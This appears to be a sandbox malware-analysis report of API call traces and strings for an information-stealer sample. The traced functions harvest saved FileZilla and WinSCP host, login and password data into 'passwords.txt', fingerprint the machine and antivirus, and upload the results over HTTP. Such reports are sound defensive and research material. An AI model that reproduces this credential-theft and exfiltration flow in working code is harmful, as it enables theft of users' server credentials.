Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 3e89ee642514d63ebe51338df4c39dbce53315f5121b1c3d1af6873a02a67f8e
Instruction ID: 5178535980331d1a95a47210b24ee6b6febbe527be0b83028620034588f0433e
Opcode Fuzzy Hash: 3e89ee642514d63ebe51338df4c39dbce53315f5121b1c3d1af6873a02a67f8e
Instruction Fuzzy Hash: FE012C79A00209ABDB10DFA8DC55FAA77B9EFC8700F144559FA05AB380DB75ED00CBA4

Function 0040FDA0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 0040FDAD
wsprintfA.USER32 ref: 0040FDC3

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: cc8115d905fbb8cdd454b3d4cd268fd51ce0050b77075ef992d59a3f7f7a50e1
Instruction ID: 2d001d16c60f98aa9cd43fb7044d9c99f47e8ba4ce822719c414ae554ccf3ebb
Opcode Fuzzy Hash: cc8115d905fbb8cdd454b3d4cd268fd51ce0050b77075ef992d59a3f7f7a50e1
Instruction Fuzzy Hash: 9DD012B590021C97C710EB90FC859A9B77DEB44301F405695EF05A2141E779AA198BE5

Function 0040B9A0 Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 335
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1

Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC

strtok_s.MSVCRT ref: 0040BA5E
GetProcessHeap.KERNEL32(00000000,000F423F,004201E9,004201E9,004201E9,004201E9), ref: 0040BAA3
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BAAA
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BAC6
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BAD1

Part of subcall function 00411200: malloc.MSVCRT ref: 00411209
Part of subcall function 00411200: strncpy.MSVCRT ref: 00411219

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BB01
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BB0C
StrStrA.SHLWAPI(00000000,<User>), ref: 0040BB42
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BB4D
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BB7D
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BB88
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC06
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC1E
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC36
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC4E
lstrcatA.KERNEL32(00000000,Soft: FileZilla), ref: 0040BC63
lstrcatA.KERNEL32(00000000,Host: ), ref: 0040BC6F
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BC7F
lstrcatA.KERNEL32(00000000,00423454), ref: 0040BC8B
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BC9B
lstrcatA.KERNEL32(00000000,00423408), ref: 0040BCA7
lstrcatA.KERNEL32(00000000,Login: ), ref: 0040BCB3
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BCC3
lstrcatA.KERNEL32(00000000,00423408), ref: 0040BCCF
lstrcatA.KERNEL32(00000000,Password: ), ref: 0040BCDB
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BCEB
lstrcatA.KERNEL32(00000000,00423408), ref: 0040BCF7
lstrcatA.KERNEL32(00000000,00423408), ref: 0040BD03

Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2

strtok_s.MSVCRT ref: 0040BD47
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD5A

Strings

<User>, xrefs: 0040BB3C
<Port>, xrefs: 0040BAFB
<Host>, xrefs: 0040BAC0
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040B9F5
Soft: FileZilla, xrefs: 0040BC5D
passwords.txt, xrefs: 0040BD67
<Pass encoding="base64">, xrefs: 0040BB77
Password: , xrefs: 0040BCD5
Login: , xrefs: 0040BCAD
Host: , xrefs: 0040BC69

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 1826205597-935134978
Opcode ID: 68d2d879e9b77c0fea5fe2b5d1b8fba3bcef5bb639e4efe5c6bc98d39bd1f8ef
Instruction ID: 995b618bf102b3cf0671245d97106fbcf4553354a52c55c251f6feeeb9f0d63c
Opcode Fuzzy Hash: 68d2d879e9b77c0fea5fe2b5d1b8fba3bcef5bb639e4efe5c6bc98d39bd1f8ef
Instruction Fuzzy Hash: A4B150729001046ADB14FBA1EC56EEE777CEE50705F54903AF502B24D2EF3C6A0DCAA9

Function 004045D0 Relevance: 61.9, APIs: 26, Strings: 9, Instructions: 696
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00404641

Part of subcall function 00410DF0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410E14
Part of subcall function 00410DF0: GetProcessHeap.KERNEL32(00000000,?,?,00404635,?,?,?,?,?,?,?,?,00000030), ref: 00410E23
Part of subcall function 00410DF0: HeapAlloc.KERNEL32(00000000,?,?,00404635,?,?,?,?,?,?,?,?,00000030), ref: 00410E2A

StrCmpCA.SHLWAPI(?,0251B748,004201E9,004201E9,004201E9,004201E9), ref: 004046A6
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004046CC
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004047B0
HttpOpenRequestA.WININET(00000000,0251B668,?,0251D9A0,00000000,00000000,?,00000000), ref: 004047ED
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404812

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,024F8D50,00000000,?,00423358,00000000,?,?), ref: 00404C21
lstrlenA.KERNEL32(00000000), ref: 00404C33
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404C45
HeapAlloc.KERNEL32(00000000), ref: 00404C4C
lstrlenA.KERNEL32(00000000), ref: 00404C5E
memcpy.MSVCRT ref: 00404C72
lstrlenA.KERNEL32(00000000,?,?), ref: 00404C8B
memcpy.MSVCRT ref: 00404C95
lstrlenA.KERNEL32(00000000), ref: 00404CA6
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404CBF
memcpy.MSVCRT ref: 00404CCC
lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404CE2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404CF3
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404D1A
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404D5F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404DB3
StrCmpCA.SHLWAPI(00000000,block), ref: 00404DCB
ExitProcess.KERNEL32 ref: 00404DD6
InternetCloseHandle.WININET(00000000), ref: 00404DE7

Strings

------, xrefs: 00404721
=tA, xrefs: 00404E59, 004048E6, 004048E9
", xrefs: 004048C4, 004049D3, 00404AE6, 00404BF6
build_id, xrefs: 004049B1
------, xrefs: 00404818, 00404929, 00404A3A, 00404B4B
block, xrefs: 00404DBD
file_data, xrefs: 00404BD4
--, xrefs: 00404710
ERROR, xrefs: 00404D27

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocFileOpenReadRequestlstrcat$BinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
String ID: ------$"$--$------$=tA$ERROR$block$build_id$file_data
API String ID: 1603122859-1039408876
Opcode ID: 2fe07b2b0317c2d985833f88672581e366e8db2608424af0ef2b2242fd126384
Instruction ID: 5c63602dc81e6f21b2342bf72322e36899336e6e37317e40e758c60d5b7de2b6
Opcode Fuzzy Hash: 2fe07b2b0317c2d985833f88672581e366e8db2608424af0ef2b2242fd126384
Instruction Fuzzy Hash: 5E42DB72D10109AADB14FBA1DC92DEE7778AF54304F50817EB212724D1EF386A4DCBA8

Function 0040E3C0 Relevance: 58.1, APIs: 19, Strings: 14, Instructions: 384
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040E3E4
memset.MSVCRT ref: 0040E3FE
memset.MSVCRT ref: 0040E40C
memset.MSVCRT ref: 0040E41A
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,00416CFD,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040E442
RegGetValueA.ADVAPI32(00416CFD,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E467
RegCloseKey.ADVAPI32(00416CFD,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E475

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

RegCloseKey.ADVAPI32(00416CFD,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E4AF
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,00416CFD,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040E4C9
RegEnumKeyExA.ADVAPI32(00416CFD,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E4E7
RegCloseKey.ADVAPI32(00416CFD,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E4FD
RegGetValueA.ADVAPI32(00416CFD,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,004201E9), ref: 0040E58A
RegGetValueA.ADVAPI32(00416CFD,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E5D5
RegGetValueA.ADVAPI32(00416CFD,?,UserName,00000002,00000000,?,?,00000000,?,Login: ,00000000,?,:22), ref: 0040E682
RegGetValueA.ADVAPI32(00416CFD,?,Password,00000002,00000000,?,?,00000000,?,00423408,00000000,?,?), ref: 0040E6F4
StrCmpCA.SHLWAPI(?,004201E9,00000000,?,Password: ,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040E724
RegEnumKeyExA.ADVAPI32(00416CFD,?,?,00000104,00000000,00000000,00000000,00000000,00000000,?,00423684), ref: 0040E7D7
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E7F1
RegCloseKey.ADVAPI32(00416CFD), ref: 0040E848

Part of subcall function 0040DD90: GetProcessHeap.KERNEL32(00000008,?,75B4EC10,75B65460,00000000), ref: 0040DDD8
Part of subcall function 0040DD90: HeapAlloc.KERNEL32(00000000), ref: 0040DDDF
Part of subcall function 0040DD90: GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDF4
Part of subcall function 0040DD90: HeapFree.KERNEL32(00000000), ref: 0040DDFB

Strings

Soft: WinSCP, xrefs: 0040E522
Login: , xrefs: 0040E63C
UseMasterPassword, xrefs: 0040E45C
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E4BF
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E42F
Password: , xrefs: 0040E6F6
:22, xrefs: 0040E614
Security, xrefs: 0040E461
PortNumber, xrefs: 0040E5C1
passwords.txt, xrefs: 0040E806
HostName, xrefs: 0040E57D
Host: , xrefs: 0040E544
UserName, xrefs: 0040E675
Password, xrefs: 0040E6E7

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Value$CloseHeapmemset$EnumOpenProcesslstrcpylstrlen$AllocFreelstrcat
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 376919160-2798830873
Opcode ID: fbd7e1fb9c34e61119653b5e7c9eee0a47cb38dfe20533517bba44489a886576
Instruction ID: ae86b70a3009f92c38161279bc2e3da00af9fe4ff8be4466f6dea0ea82a0e72c
Opcode Fuzzy Hash: fbd7e1fb9c34e61119653b5e7c9eee0a47cb38dfe20533517bba44489a886576
Instruction Fuzzy Hash: 7BD11DB2910119AEDB24EBA1DC91EEEB37CAF54304F50457EF105B2591EB386B48CB68

Function 004144B0 Relevance: 48.1, APIs: 2, Strings: 25, Instructions: 834
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040FB60: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004201E9,?,?,?,?,?,?,?,00416C7F,?), ref: 0040FB6E
Part of subcall function 0040FB60: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004201E9,?,?,?,?,?,?,?,00416C7F,?), ref: 0040FB75
Part of subcall function 0040FB60: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004201E9,?,?,?,?,?,?,?,00416C7F,?), ref: 0040FB81
Part of subcall function 0040FB60: wsprintfA.USER32 ref: 0040FBAD

Part of subcall function 00410340: memset.MSVCRT ref: 00410365
Part of subcall function 00410340: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004201E9), ref: 00410382
Part of subcall function 00410340: RegQueryValueExA.KERNEL32(004201E9,MachineGuid,00000000,00000000,00000000,000000FF), ref: 004103A4
Part of subcall function 00410340: RegCloseKey.ADVAPI32(004201E9), ref: 004103AE
Part of subcall function 00410340: CharToOemA.USER32(00000000,?), ref: 004103C2

Part of subcall function 004103E0: GetCurrentHwProfileA.ADVAPI32(00000000), ref: 004103EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 00410420: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041043C
Part of subcall function 00410420: GetVolumeInformationA.KERNEL32({kA,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410475
Part of subcall function 00410420: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104BF
Part of subcall function 00410420: HeapAlloc.KERNEL32(00000000), ref: 004104C6

GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00423684,00000000,?,00000000,00000000,004201E9), ref: 00414728

Part of subcall function 00411090: OpenProcess.KERNEL32(00000410,00000000,?), ref: 004110A5
Part of subcall function 00411090: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004110C0
Part of subcall function 00411090: CloseHandle.KERNEL32(00000000), ref: 004110C7

Part of subcall function 004105A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004105B5
Part of subcall function 004105A0: HeapAlloc.KERNEL32(00000000), ref: 004105BC

Part of subcall function 00410730: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 00410758
Part of subcall function 00410730: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000), ref: 00410769
Part of subcall function 00410730: CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?), ref: 00410783
Part of subcall function 00410730: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?), ref: 004107BC
Part of subcall function 00410730: VariantInit.OLEAUT32(?), ref: 0041081B

Part of subcall function 00410900: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 00410928
Part of subcall function 00410900: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000), ref: 00410939
Part of subcall function 00410900: CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?), ref: 00410953
Part of subcall function 00410900: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?), ref: 0041098C
Part of subcall function 00410900: VariantInit.OLEAUT32(?), ref: 004109E3

Part of subcall function 0040FB20: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00414941,00000000,?,Computer Name: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 0040FB2C
Part of subcall function 0040FB20: HeapAlloc.KERNEL32(00000000,?,?,?,00414941,00000000,?,Computer Name: ,00000000,?,00423408,00000000,?,00000000,00000000,00000000), ref: 0040FB33
Part of subcall function 0040FB20: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FB47

Part of subcall function 0040FAE0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417612,004201E9), ref: 0040FAEC
Part of subcall function 0040FAE0: HeapAlloc.KERNEL32(00000000,?,?,?,00417612,004201E9), ref: 0040FAF3
Part of subcall function 0040FAE0: GetUserNameA.ADVAPI32(00000000,004201E9), ref: 0040FB07

Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000030,?,00414A13,?,00000000,?,Display Resolution: ,00000000,?,00423408,00000000,?,00000000), ref: 00410300
Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,00000030,?,00414A13,?,00000000,?,Display Resolution: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 00410307
Part of subcall function 004102C0: wsprintfA.USER32 ref: 00410317

Part of subcall function 0040FC30: GetKeyboardLayoutList.USER32(00000000,00000000,004201E9,00000000,?,00000030), ref: 0040FC4D
Part of subcall function 0040FC30: LocalAlloc.KERNEL32(00000040,00000000,?,00000030), ref: 0040FC5F
Part of subcall function 0040FC30: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000030), ref: 0040FC69
Part of subcall function 0040FC30: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000030), ref: 0040FC93
Part of subcall function 0040FC30: LocalFree.KERNEL32(00000000,?,00000030), ref: 0040FD16

